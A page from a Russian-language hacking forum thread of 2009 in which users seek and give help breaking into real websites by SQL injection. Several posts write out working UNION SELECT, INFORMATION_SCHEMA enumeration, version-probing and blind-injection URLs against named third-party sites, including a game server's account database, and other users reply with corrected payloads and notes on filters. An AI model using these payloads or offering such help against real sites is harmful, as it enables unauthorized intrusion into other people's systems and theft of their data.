HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 600 из 2438 « Первая < 100500550590 596 597 598 599 600 601 602 603 604 61065070011001600 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5991  
Старый 15.03.2009, 17:07
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
Цитата:
Сообщение от Imperou$  
Остальным желающим в пм могу скинуть.
кидай
 
Ответить с цитированием

  #5992  
Старый 15.03.2009, 17:33
newpdv
Новичок
Регистрация: 04.09.2008
Сообщений: 10
Провел на форуме:
28477

Репутация: 1
По умолчанию
Цитата:
Сообщение от newpdv  
Расскажите как можно добавить несколько одинаковых сайтов?
http://1xx.ru/1x9
Нет идей??
 
Ответить с цитированием

  #5993  
Старый 15.03.2009, 18:57
fedi
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913

Репутация: 3
По умолчанию
С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world


версия - 1 or 1=@@version--
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблицы'))--

Проблема в том что запросы такого видв не проходят.
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6, 7,8,9,0,11,12--
Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
Плиз скажите как с ними работать и что полезного и как из них взять.
Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.
 
Ответить с цитированием

  #5994  
Старый 15.03.2009, 20:20
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию
Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.
 
Ответить с цитированием

  #5995  
Старый 15.03.2009, 20:50
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Imperou$, там функции mysql_result() передается пустой результат от запроса. От того и ошибка


fedi, доступа к базам л2-сервара нету

http://darkomen.ru/?go=19&indx=-1+union+select+1,2,3,4,5,6,7,8,9,1,1,1+from+lin2db .user_account

Его как правило и не бывает. С этими базами работает непосредственно л2-сервер
 
Ответить с цитированием

  #5996  
Старый 15.03.2009, 21:58
fedi
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913

Репутация: 3
По умолчанию
Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?
 
Ответить с цитированием

  #5997  
Старый 15.03.2009, 22:00
fedi
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913

Репутация: 3
По умолчанию
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
 
Ответить с цитированием

  #5998  
Старый 15.03.2009, 22:22
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Цитата:
Сообщение от Imperou$  
Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.
по моему это просто раскрытие пути и вовсе не скуля
 
Ответить с цитированием

  #5999  
Старый 15.03.2009, 22:25
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию
Цитата:
Сообщение от fedi  
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
нету там фильтра на from
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+IN FORMATION_SCHEMA.TABLES--
 
Ответить с цитированием

  #6000  
Старый 15.03.2009, 22:34
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию
Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select.
Версия пятая.

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline= 141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2

что можно сделать? Очень нужен совет.
 
Ответить с цитированием
Ответ
Страница 600 из 2438 « Первая < 100500550590 596 597 598 599 600 601 602 603 604 61065070011001600 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ